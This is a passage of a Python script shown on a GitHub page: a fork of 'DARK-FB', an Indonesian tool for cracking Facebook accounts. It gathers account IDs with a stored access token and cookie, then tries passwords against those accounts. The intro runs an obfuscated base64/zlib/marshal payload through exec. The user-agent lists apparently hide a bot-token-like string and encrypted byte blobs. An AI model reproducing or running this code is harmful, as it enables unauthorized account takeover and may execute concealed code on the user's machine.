forked from kopets99/DARK-FB
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
1916 lines (1800 loc) · 94.1 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#UTF-PYTHON-3 BUAT OLEH RIKSY - 27 April 2022
import os,sys
try:
import rich
except ImportError:
os.system('pip install rich')
try:
import rich
except ImportError:
os.sys.exit("[?] Maaf Ngab, Sepertinya Tidak Bisa Install Rich(Install Manual : python -m pip install rich &> /dev/null)")
from rich.table import Table as me
from rich.console import Console as sol
from rich.console import Group as gp
from rich.panel import Panel as nel
from rich import print as cetak
from rich.markdown import Markdown as mark
from rich.columns import Columns as col
from rich import print as iprint
from rich.panel import Panel
from rich.tree import Tree
from rich import print as rprint
from rich.progress import track
from rich import print as prints
from rich.console import Console
from rich.table import Table
from rich.columns import Columns
from rich.progress import Progress,SpinnerColumn,BarColumn,TextColumn,TimeElapsedColumn
from rich.progress import Task
from rich.progress import DownloadColumn,SpinnerColumn,TransferSpeedColumn
from rich import filesize, get_console
console = Console()
from rich.console import Group
from rich.markdown import Markdown
from rich.panel import Panel
from rich.syntax import Syntax
from rich.table import Table
from rich.box import DOUBLE, ROUNDED
from rich.padding import Padding
from rich.box import ROUNDED, Box
#from rich.box import loppp
#from rich.spinner import *
try:
import os,sys
try:
import requests
except ImportError as e:
print(f"[X] Sedang Install Bahan {e.name}, Mohon Bersabar....")
os.system(f"python -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip2 install {e.name} &> /dev/null")
os.system(f"python -m pip2 install {e.name} &> /dev/null")
try:
import bs4
except ImportError as e:
print(f"[X] Sedang Install Bahan {e.name}, Mohon Bersabar....")
os.system(f"python -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip2 install {e.name} &> /dev/null")
os.system(f"python -m pip2 install {e.name} &> /dev/null")
try:
import stdiomask
except ImportError as e:
print(f"[X] Sedang Install Bahan {e.name}, Mohon Bersabar....")
os.system(f"python -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip2 install {e.name} &> /dev/null")
os.system(f"python -m pip2 install {e.name} &> /dev/null")
try:
import mechanize
except ImportError as e:
print(f"[X] Sedang Install Bahan {e.name}, Mohon Bersabar....")
os.system(f"python -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip install {e.name} &> /dev/null")
os.system(f"python2 -m pip2 install {e.name} &> /dev/null")
os.system(f"python -m pip2 install {e.name} &> /dev/null")
try:
import subprocess
null = open(os.devnull, "w")
insta = subprocess.call(["dpkg","-s","play-audio"],stdout=null,stderr=subprocess.STDOUT)
if insta !=0:os.system('pkg install play-audio -y &> /dev/null')
null.close()
musik_="Kontol"
except:musik_="Jangan"
except:pass
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,uuid,ipaddress,calendar,requests,mechanize,bs4,sys,os,subprocess,uuid,requests,sys,random,time,re,base64,json,platform
import sys, os, subprocess, platform, struct
import os, sys, re, time, requests, calendar, random, bs4, subprocess, uuid, json
import requests as req
import time,random,json
from requests.exceptions import ConnectionError
from bs4 import BeautifulSoup as parser
from bs4 import BeautifulSoup as par
from bs4 import BeautifulSoup
from random import choice as pilih
from concurrent.futures import ThreadPoolExecutor as __Kiky__
from concurrent.futures import ThreadPoolExecutor
from requests.exceptions import ConnectionError
from datetime import datetime
from urllib.parse import quote
from datetime import date
#from get_useragents import useragents
#ua_lo = useragents.UserAgents(limit=2000)
#user_agents = ua_lo.GetUserAgents()
#random_ua = ua_lo.RandomUserAgents()
# --[WARNA]--
H = "#000000" # Hitam
M = "#FF0000" # Merah
I = "#00FF00" # Hijau
K = "#FFFF00" # Kuning
B = "#00C8FF" # Biru
U = "#AF00FF" # Ungu
P = "#FF00FF" # Pink
C = "#00FFFF" # Biru Muda
Q = "#FFFFFF" # Putih
J = "#FF8F00" # Jingga
A = "#AAAAAA" # Abu-Ab
O = "#FFA500" # OREN
# --[WARNAV2]--
p = '\x1b[0;97m' # PUTIH
m = '\x1b[0;91m' # MERAH
i = '\x1b[1;92m' # HIJAU
k = '\x1b[1;93m' # KUNING
b = '\x1b[1;94m' # BIRU
u = '\x1b[1;95m' # UNGU
c = '\x1b[0;96m' # BIRU MUDA
q='\x1b[0m' # WARNA MATI
h = "\x1b[0;90m" # Hitam
j = "\x1b[38;5;208m" # Jingga
a = "\x1b[38;5;248m" # Abu-Abu
o='\033[38;2;255;127;0;1m' #ORANGE
# --[WARNA DALAM]--
h2="\033[40m"
b2="\033[44m"
c2="\033[46m"
i2="\033[42m"
u2="\033[45m"
m2="\033[41m"
p2="\033[47m"
k2="\033[43m"
#WARNA rick(kotak)
HH = "[#000000]" # Hitam
MM = "[#FF0000]" # Merah
II = "[#00FF00]" # Hijau
KK = "[#FFFF00]" # Kuning
BB = "[#00C8FF]" # Biru
UU = "[#AF00FF]" # Ungu
PP = "[#FF00FF]" # Pink
CC = "[#00FFFF]" # Biru Muda
QQ = "[#FFFFFF]" # Putih
JJ = "[#FF8F00]" # Jingga
AA = "[#AAAAAA]" # Abu-Abu
OO = "[#FFA500]" # OREN
# PENGATURAN WAKTU/JAMZ
ses = requests.Session()
current = datetime.now()
durasi = str(datetime.now().strftime("%d-%m-%Y"))
tahun = current.year
bulan = current.month
hari = current.day
current = datetime.now()
waktuu = str(datetime.now().strftime("%Y-%m-%d"))
waktu = str(datetime.now().strftime("%Y%m%d"))
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
jamz = datetime.now().strftime('%H:%M:%S')
jam_ = datetime.now().strftime('%H%M%S')
jam__ = str(datetime.now().strftime("%d%m%Y"))
# KUMPULAN USER AGNET
ua01= ['Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36']
ua02= ['Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36']
ua03= ["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaX2-00/5.0 (08.25) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-T875 Build/RP1A.200 720.012) AppleWebKit /537.36 (KHTML, like Gecko) Version /4.0 Chrome /96.0.4664.104 Safari/537.36 GNews Android /2022034746 UNTRUSTED/1.0","Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]",b"\xaaJ\xdb\x81\x01\xfc\xa4\xcaG\xd8\x01\xca.(\x91\xa9c\xafb\xa6\xa6\x94/\xad\x82\x94\x84`\xd0\xbb\xe2\xaf\xe2\xba&\xb80s\xedl\xf5=C\x8caN\xdc0;$\xf0\xae&\xc7\xaeq7U\x8b\r[\x8cg\xd3\x88\xd74\xb8\x07\x9b2\x13\x95\\\xe3/N\x02\xfb@\xee/\x9c\x81\x1e(\x18\xec\xcd;\xab+M\xdb\x9a\xd3\xf9\xf4\x18#[@\xa4\xf0\xae\xb5\xfdZ\x07}\xa9\xff=\xa6\x14\xa4\r\x87@\xbb\xda\x04\xbd\xf6[\x14\x8f\x88Q\xed;\xc5\x9e2e`\xe5\xc7~~\x03\xf4\xb8\x12\n\xa4[\xd5R\xa5\x94(?l\x94\x0be$/K\xfc\x0c0\x83\x0eIN%\x9cx","Mozilla/5.0 (Linux; U; Android 9; LGL722DL Build/PKQ1.190302.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 OPR/60.0.2254.59405","Mozilla/5.0 (Linux; Android 10; Nokia 7.2 Build/QKQ1.191014.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/264.0.0.44.111;]"]
ua04= ["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaX2-00/5.0 (08.25) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-T875 Build/RP1A.200 720.012) AppleWebKit /537.36 (KHTML, like Gecko) Version /4.0 Chrome /96.0.4664.104 Safari/537.36 GNews Android /2022034746 UNTRUSTED/1.0","5353538250:AAEy8dG0bzRX2mxgLoGJqWYcqk9fKok_Sjg","Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]","Mozilla/5.0 (Linux; U; Android 9; LGL722DL Build/PKQ1.190302.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 OPR/60.0.2254.59405","Mozilla/5.0 (Linux; Android 10; Nokia 7.2 Build/QKQ1.191014.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/264.0.0.44.111;]"]
ua09= ["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaX2-00/5.0 (08.25) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-T875 Build/RP1A.200 720.012) AppleWebKit /537.36 (KHTML, like Gecko) Version /4.0 Chrome /96.0.4664.104 Safari/537.36 GNews Android /2022034746 UNTRUSTED/1.0",b'rJLw2/F3v0PfZ+F88lY2OO393v/jb/tn/9E8UqHfu+y5+fXQtMyf623eEXAumpu77SWYBSAkbzDsNmOGxO4qRbL4bSRcNzAYvVmnUoEh9s1SzlaPvdVYJOarnmlFTEPf6FKmEZwkS4hkdrFrJL9yMk4kSf8SjmhF1uswHbWNjoCTvTbCRXnJiUJidV8K0aCguz14iRl9Xw9Q76KAGt6m4xH3sckRYqgcrIu5wOJIhbKd5LKwmEB4WSbyFjrpgirsOaVMR7cWgAUclQdxNWZL+VLAQpNt3V4OtBUTFa2bfxkz4EUw2k/FNp3wjXia+fANSlCB0joFGzZiX/w9kPEEKoUkDQneV1ngvvZCTbA3gxeroxHtKIku/F6walDbrB7RVPyu04SpZ2rqSJmw87EmfaR/DfDylxjbV7QyBO/eTuTVHwloayU0cnouKV9Qer3mlPbtAe/KoAUcG40b2afoMPZ5VJq+P0jlXC0o5r+QrPH1Wxjz3HXGw2TWH6CjqcCtgL56PfVPppkZaSoGuoIlFrIYGvvDLvthj75bV/0ry9BMn75T57j58MChDtc1H8Yw53+/x9wxg3r6/C94ZxROynyKj7Edi2cQgK5CG5eixFCaQjEEop9Apkqqa2EiBQhx5OcgGHWRAA0mSmjkdxJe',"Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]","Mozilla/5.0 (Linux; U; Android 9; LGL722DL Build/PKQ1.190302.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 OPR/60.0.2254.59405","Mozilla/5.0 (Linux; Android 10; Nokia 7.2 Build/QKQ1.191014.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.116 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/264.0.0.44.111;]"]
ua05= ['Mozilla/5.0 (Linux; U; Android 2.3.4; pt-pt; SonyEricssonLT18a Build/4.0.1.A.0.266) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.2.1; ru-ru; 9930i Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 2.3.4; ru-ru; MID Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.3; en-us; ASUS_T00J Build/JSS15Q) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 4.2.2; ru-ru; Fly IQ4404 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 YandexSearch/7.16']
ua06= ['Mozilla/5.0 (Linux; U; Android 2.3.4; pt-pt; SonyEricssonLT18a Build/4.0.1.A.0.266) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.2.1; ru-ru; 9930i Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 2.3.4; ru-ru; MID Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.3; en-us; ASUS_T00J Build/JSS15Q) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 4.2.2; ru-ru; Fly IQ4404 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 YandexSearch/7.16']
ugen2,ugen,ugen_,ugen__=[],[],[],[]
link_app,prox_k,id_ri,idd,id,loop,ok,cp,yyy,apk_me,pass_,method,prox_,opsi_y,url_met,pass_man,fps = [],"",[100063690353340],[],[],0,[],[],"AKTIF","TIDAK","","",[],"DOWN","","",""
#[100063690353340,110877271176800]
sistim=""
AnTi_rIkOd=""
def kotak(kata, wwe, wew):
pertama = kata
kedua = mark(pertama, style=wwe)
sol().print(kedua, style=wew)
def folder():
try:os.mkdir("data")
except:pass
try:os.mkdir("results")
except:pass
def play_mpv(x):
if "Jangan" == musik_ or musik_ == "Jangan":pass
else:
try:os.popen("play-audio "+x)
except:pass
def cek_apk_hasil_crk():
cekfile_crk("results")
nama_z = input(">--Nama File--> ")
if nama_z == "":kotak("# JANGAN KOSONG KONTOL",M,Q);time.sleep(2);exit()
try:total__ = len(open(nama_z,"r").readlines())
except FileNotFoundError:kotak('# FILE TIDAK ADA',K,Q);exit()
with __Kiky__(max_workers=10) as (form):
for data in open(nama_z,"r").readlines():
try:
data = data.replace("\n","")
try:user, pw = data.split("|")
except:user, pw, coki = data.split("|")
form.submit(get_apk, user,pw,coki)
except:pass
exit()
class open_role:
def __init__(self):
global tiktok,pupuk,puput
try:
tiktok = open("data/login.txt","r").read()
except:pass
try:
pupuk = open("data/cookie.txt","r").read()
puput = {'cookie':pupuk}
except:pass
class Main():
def __init__(self):
os.system("clear")
open_role();self.intro()
def menu_del(self, kataa):
iprint(Panel(f"{MM}MOHON MAAF MENU {QQ}[{CC}{kataa}{QQ}]{MM} INI BELUM TERSEDIA... BACK TO MENU", style=Q));time.sleep(3)
Main()
def intro(self):
_ = lambda __ : __import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(__[::-1])));exec((_)(b'==gkogSPAwoUMwTcIPhcIcsaTqpUfu5khV8uwmqtixPTWQrCEDVyZxCytmkYfbxVXEzbLKPm36Ljb9sRtYvYJ5ndrRhbmlUcmF3WUsnJf27hnCrQfO6oAOmgL+7tnCpQ7+JqI9FqCJLpV6lYuN2iUMnJMCpBGZgQbHQdLWSlhEZmZmblpUZMFGTlhgZKF2CipuZIFGSliAkaFTMAsDELDAkZLxJe')) # File Anti Rikod
now = datetime.now()
hour = now.hour
if hour < 4:
waktu = "Selamat Dini Hari"
elif 4 <= hour < 12:
waktu = "Selamat Pagi"
elif 12 <= hour < 15:
waktu = "Selamat Siang"
elif 15 <= hour < 17:
waktu = "Selamat Sore"
else:
waktu = "Selamat Malam"
try:token = open("data/login.txt","r").read()
except:login()
try:cookie = open("data/cookie.txt","r").read()
except:pass
try:
xnxzx = ""+cookie
zza = f"{i}Token{q} And {k}Cookie{q}"
except:
zza = f"{i}Token{q}"
try:sh = requests.get('https://httpbin.org/ip').json()
except:sh = {'origin':'-'}
tod = f""" ___ __ ____ __\n / _ \ ___ _ ____ / /__ ____ / __/ / /\n / // // _ `/ / __/ / '_/ /____/ / _/ / _ \ \n /____/ \_,_/ /_/ /_/\_\ /_/ /_.__/"""
my_ = Tree(" ",highlight=True, hide_root=True)
my__= my_.add(Group(Panel(tod,title=waktu,style="white on black",box=DOUBLE,padding=1)),guide_style="bold magenta")
my_r = my__.add(f"{c}Mr.Risky{q}")
my_rr= my_r.add(f"\r{k}My Github{q}")
my_rr.add(f"{c}https://githuh.com/Dumai-991{q}")
my_rr.add(f"{c}https://githuh.com/Dumai-200{q}")
my_rrr=my_r.add(f"\r{i}My WhatsApp{q}")
my_rrr.add(f"{b}6283893415477{q}")
code="""Wans X Gans
Jeck X Nano
Xenzi Ganz
Radhin Al Haady
Zee K World
Moch Aang Ardiansyah XD"""
pyhon = Syntax(code, "python", theme="monokai", line_numbers=True)
my_rrrr=my_r.add(f"\r{b}My Team{q}")
my_rrrr.add(Group(pyhon))
my_rrrrr=my_r.add(f"\r{c}Information{q}")
tod=my_rrrrr.add(f"{j}Grub WhatsApp{q}")
tod.add(f"{b}https://chat.whatsapp.com/GOzdlYW8my4LlEKkscnxl1{q}")
tod_=my_rrrrr.add(f"{j}Facebook Page(Halaman Facebook){q}")
tod_.add(f"{b}https://www.facebook.com/101003905507650{q}")
tod_.add(f"{b}https://www.facebook.com/110877271176800{q}")
try:
yz = requests.Session().get('https://graph.facebook.com/me?fields=name,id&access_token=%s'%(tiktok),cookies=puput)
zxc = json.loads(yz.text)
nama= zxc["name"]
idz = zxc["id"]
except:
try:os.remove('data/login.txt')
except:pass
try:os.remove('data/cookie.txt')
except:pass
token= Tree(" ",highlight=True, hide_root=True)
token_e= token.add(Group(Panel(tod,title=waktu,style="white on black",box=DOUBLE,padding=1)),guide_style="bold magenta")
prints(token_e)
kotak("# TOKEN KADALUARSA", M, Q)
os.sys.exit()
data_=my_rrrrr.add(f"\r{k}Data-Data Facebook Anda{q}")
data_.add(f"Username/Id :{u}{nama}{q}")
data_.add(f"Tanggal BerGabung :{u}{waktuu}{q}")
data_.add(f"Ip Address :{u}{str(sh['origin'])}{q}")
data_.add(f"Login Menggunakan :{u}{zza}{q}")
prints(my__)
try:open("data/kata","r").read()
except:open("data/kata","w").write("#SELAMAT DATANG, TERIMA KASIH TELAH LIHAT");kotak(f"# SELAMAT DATANG PENGGUNA BARU !!", K, C)
top = f"""01
02
03
04
05
06
00"""
tip = f"""Crack Dari Public
Crack Dari Public{QQ}({KK}MASAL{QQ})
Crack Dari Follow
Crack Dari Random Email
Check Jumlah Teman
Check Hasil Crack
Check Options Akun Sesi
Log Out Dari Akun (Keluar)"""
lpp = f"""{II}ONN
{II}ONN
{II}ONN
{II}ONN
{II}ONN
{II}ONN
{II}ONN"""
tod = me()
tod.add_column("NO", style=K, justify='center')
tod.add_column("PILIHAN", style=Q, justify='center',width=60)
tod.add_column("STATUS", style=M, justify='center')
tod.add_row(top,tip, lpp)
sol().print(tod, justify='center')
self.pilihan()
def pilihan(self):
ki = input(f'>--Pilih 1-7--> ')
if ki in ["1","01"]:self.public();os.sys.exit()
elif ki in ["2","02"]:self.public_mass();os.sys.exit()
elif ki in ["3","03"]:self.follow();os.sys.exit()
elif ki in ["4","04"]:self.random_email();os.sys.exit()
elif ki in ["5","05"]:self.cek_jumlah_teman();os.sys.exit()
elif ki in ["6","06"]:self.rek();os.sys.exit()
elif ki in ["7","07"]:self.cek_opsi();os.sys.exit()
elif ki in ["00","00"]:self.logut()
else:
tod = f"{MM}Maaf Pilihan {QQ}[{CC}{ki}{QQ}] {MM}Anda Tidak Tersedia.."
iprint(Panel(tod, style=Q))
time.sleep(3),Main()
def logut(self):
try:os.remove('data/login.txt')
except:pass
try:os.remove('data/cookie.txt')
except:pass
kotak("# Token Dan Cookies Berhasil DiHapus (Berhasil Log Out)", M, Q)
os.sys.exit()
def ambil_nama(self,idd):
try:
yz = requests.Session().get('https://graph.facebook.com/%s?fields=name,id&access_token=%s'%(idd,tiktok),cookies=puput)
zxc = json.loads(yz.text)
nama= zxc["name"]
except Exception as e:
iprint(Panel(f"Mohon Maaf Idz {QQ}[{MM}{idd}{QQ}]{CC} Tidak Ditemukan"))
time.sleep(3)
Main()
return nama
def ubah_nama(self,idd):
try:
yz = requests.Session().get('https://graph.facebook.com/%s?fields=name,id&access_token=%s'%(idd,tiktok),cookies=puput)
zxc = json.loads(yz.text)
nama= zxc["name"]
except Exception as e:
iprint(Panel(f"Mohon Maaf Idz {QQ}[{MM}{idd}{QQ}]{CC} Tidak Ditemukan"))
time.sleep(3)
Main()
return nama
def ubah_user(self,username):
try:
if username == "me":
return(username)
else:
url = 'https://mbasic.facebook.com/' + username
with requests.Session() as xyz:
req = par(xyz.get(url,cookies=puput).content,'html.parser')
kut = req.find('a',string='Lainnya')
id = str(kut['href']).split('=')[1]
id = id.replace("&refid","")
id=id.replace("&paipv", "")
# id = re.search('owner_id=(.*?)"',str(kut)).group(1)
return(id)
except Exception as e:return(username)
def ubah_user1(self,idd):
try:
if idd == "me":idd = "me"
else:
payload = {"fburl": "https://free.facebook.com/{}".format(idd), "check": "Lookup"}
if "facebook" in idd:
payload = {"fburl": idd, "check": "Lookup"}
mmk = requests.post("https://lookup-id.com/", data=payload).content
xxx = par(mmk, "html.parser")
idtt = xxx.find("span", id="code")
asw = idtt.text
idd = asw
except:idd = idd
return idd
def random_email(self):
x = 0
tod = me()
tod.add_column("NO", style=K, justify='center')
tod.add_column("PILIHAN", style=Q, justify='center',width=60)
tod.add_row("1\n2\n3\n4","Username + @Gmail.com\nUsername + @Yahoo.com\nUsername + @Hotmail.com\nUsername + @Outlook.com")
sol().print(tod, justify='center')
ask = input(f">--Pilih 1-4--> ")
if ask in["1"]:
email = "@gmail.com"
nama = input(f">--Masukan Nama--> ")
jumlah = int(input(f">--Limit--> "))
for z in range(jumlah):
x += 1
idd.append(nama+str(x)+email+"<=>"+nama)
elif ask in["2"]:
email = "@yahoo.com"
nama = input(f">--Masukan Nama--> ")
jumlah = int(input(f">--Limit--> "))
for z in range(jumlah):
x += 1
idd.append(nama+str(x)+email+"<=>"+nama)
elif ask in["3"]:
